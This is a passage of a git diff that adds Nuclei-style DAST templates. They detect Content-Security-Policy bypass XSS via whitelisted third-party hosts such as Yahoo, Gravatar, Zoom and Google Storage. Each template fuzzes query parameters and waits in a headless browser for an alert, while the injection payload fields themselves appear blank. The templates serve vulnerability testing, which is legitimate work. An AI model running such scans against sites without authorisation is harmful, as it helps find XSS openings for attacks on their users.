+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,ytimg
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - '
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: s_ytimg_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "s_ytimg_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/search-yahoo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/search-yahoo-csp-xss.yaml
new file mode 100644
index 00000000000..ea79c71aadc
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/search-yahoo-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: search-yahoo-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Yahoo Search
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,yahoo
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: search_yahoo_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "search_yahoo_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/secure-adnxs-csp-xss.yaml b/dast/vulnerabilities/xss/csp/secure-adnxs-csp-xss.yaml
new file mode 100644
index 00000000000..852f6816740
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/secure-adnxs-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: secure-adnxs-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Secure Adnxs
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,adnxs
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: secure_adnxs_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "secure_adnxs_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/secure-gravatar-csp-xss.yaml b/dast/vulnerabilities/xss/csp/secure-gravatar-csp-xss.yaml
new file mode 100644
index 00000000000..471ca9e670f
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/secure-gravatar-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: secure-gravatar-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Secure Gravatar
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,gravatar
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: secure_gravatar_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "secure_gravatar_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/secure-quantserve-csp-xss.yaml b/dast/vulnerabilities/xss/csp/secure-quantserve-csp-xss.yaml
new file mode 100644
index 00000000000..dc5b9781ef5
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/secure-quantserve-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: secure-quantserve-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Secure Quantserve
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,quantserve
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: secure_quantserve_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "secure_quantserve_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/securepubads-doubleclick-csp-xss.yaml b/dast/vulnerabilities/xss/csp/securepubads-doubleclick-csp-xss.yaml
new file mode 100644
index 00000000000..55cb72cfac3
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/securepubads-doubleclick-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: securepubads-doubleclick-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Secure DoubleClick PubAds
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,doubleclick
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: securepubads_doubleclick_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "securepubads_doubleclick_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/segapi-quantserve-csp-xss.yaml b/dast/vulnerabilities/xss/csp/segapi-quantserve-csp-xss.yaml
new file mode 100644
index 00000000000..8b0b3c98ce3
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/segapi-quantserve-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: segapi-quantserve-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via SegAPI Quantserve
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,quantserve
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: segapi_quantserve_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "segapi_quantserve_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/server-ethicalads-csp-xss.yaml b/dast/vulnerabilities/xss/csp/server-ethicalads-csp-xss.yaml
new file mode 100644
index 00000000000..c2e769b64b1
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/server-ethicalads-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: server-ethicalads-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via EthicalAds Server
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,ethicalads
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: server_ethicalads_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "server_ethicalads_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/shop-samsung-csp-xss.yaml b/dast/vulnerabilities/xss/csp/shop-samsung-csp-xss.yaml
new file mode 100644
index 00000000000..eb8c6ae1ad1
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/shop-samsung-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: shop-samsung-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Samsung Shop
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,samsung
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: shop_samsung_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "shop_samsung_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/skype-config-csp-xss.yaml b/dast/vulnerabilities/xss/csp/skype-config-csp-xss.yaml
new file mode 100644
index 00000000000..008ab5fb3d5
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/skype-config-csp-xss.yaml
@@ -0,0 +1,57 @@
+id: skype-config-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Skype Config
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,skype
+
+#flow: http() && headless()
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: skype_config_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "skype_config_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/smartcaptcha-yandexcloud-csp-xss.yaml b/dast/vulnerabilities/xss/csp/smartcaptcha-yandexcloud-csp-xss.yaml
new file mode 100644
index 00000000000..b8d7e8efb06
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/smartcaptcha-yandexcloud-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: smartcaptcha-yandexcloud-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via YandexCloud SmartCaptcha
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,yandexcloud
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: smartcaptcha_yandexcloud_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "smartcaptcha_yandexcloud_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/social-yandex-csp-xss.yaml b/dast/vulnerabilities/xss/csp/social-yandex-csp-xss.yaml
new file mode 100644
index 00000000000..5dcfe7ac37c
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/social-yandex-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: social-yandex-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Yandex Social
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,yandex
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: social_yandex_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "social_yandex_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/soundcloud-csp-xss.yaml b/dast/vulnerabilities/xss/csp/soundcloud-csp-xss.yaml
new file mode 100644
index 00000000000..1ccebf63711
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/soundcloud-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: soundcloud-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via SoundCloud
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,soundcloud
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: soundcloud_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "soundcloud_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/srv-carbonads-csp-xss.yaml b/dast/vulnerabilities/xss/csp/srv-carbonads-csp-xss.yaml
new file mode 100644
index 00000000000..2a16a5ae548
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/srv-carbonads-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: srv-carbonads-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via CarbonAds
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,carbonads
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: srv_carbonads_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "srv_carbonads_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/ssl-gstatic-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ssl-gstatic-csp-xss.yaml
new file mode 100644
index 00000000000..89cb1f2fb01
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/ssl-gstatic-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: ssl-gstatic-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Gstatic SSL
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,gstatic
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - '
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: ssl_gstatic_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "ssl_gstatic_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/sso-bytedance-csp-xss.yaml b/dast/vulnerabilities/xss/csp/sso-bytedance-csp-xss.yaml
new file mode 100644
index 00000000000..4f9cc6338c9
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/sso-bytedance-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: sso-bytedance-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via ByteDance SSO
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,bytedance
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: sso_bytedance_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "sso_bytedance_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/st3-zoom-csp-xss.yaml b/dast/vulnerabilities/xss/csp/st3-zoom-csp-xss.yaml
new file mode 100644
index 00000000000..444ee9ab8d5
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/st3-zoom-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: st3-zoom-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Zoom ST3
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,zoom
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - '
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: st3_zoom_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "st3_zoom_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/stackexchange-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/stackexchange-api-csp-xss.yaml
new file mode 100644
index 00000000000..805ef3c0e34
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/stackexchange-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: stackexchange-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via StackExchange API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,stackexchange
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: stackexchange_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "stackexchange_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/static-parastorage-csp-xss.yaml b/dast/vulnerabilities/xss/csp/static-parastorage-csp-xss.yaml
new file mode 100644
index 00000000000..8a0729fae8d
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/static-parastorage-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: static-parastorage-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Parastorage Static
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,parastorage
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - '
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: static_parastorage_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "static_parastorage_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/storage-googleapis-csp-xss.yaml b/dast/vulnerabilities/xss/csp/storage-googleapis-csp-xss.yaml
new file mode 100644
index 00000000000..7f9571d8376
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/storage-googleapis-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: storage-googleapis-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google Storage
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,google
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: storage_googleapis_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "storage_googleapis_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/storemapper-herokuapp-fastly-csp-xss.yaml b/dast/vulnerabilities/xss/csp/storemapper-herokuapp-fastly-csp-xss.yaml
new file mode 100644
index 00000000000..32994ba3d9c
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/storemapper-herokuapp-fastly-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: storemapper-herokuapp-fastly-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Storemapper Herokuapp Fastly
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,storemapper
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: storemapper_herokuapp_fastly_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "storemapper_herokuapp_fastly_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/suggest-taobao-csp-xss.yaml b/dast/vulnerabilities/xss/csp/suggest-taobao-csp-xss.yaml
new file mode 100644
index 00000000000..cf1e7e98928
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/suggest-taobao-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: suggest-taobao-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Taobao Suggest
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,taobao
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: suggest_taobao_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "suggest_taobao_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/suggestqueries-youtube-csp-xss.yaml b/dast/vulnerabilities/xss/csp/suggestqueries-youtube-csp-xss.yaml
new file mode 100644
index 00000000000..fa2828d7c4e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/suggestqueries-youtube-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: suggestqueries-youtube-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via YouTube SuggestQueries
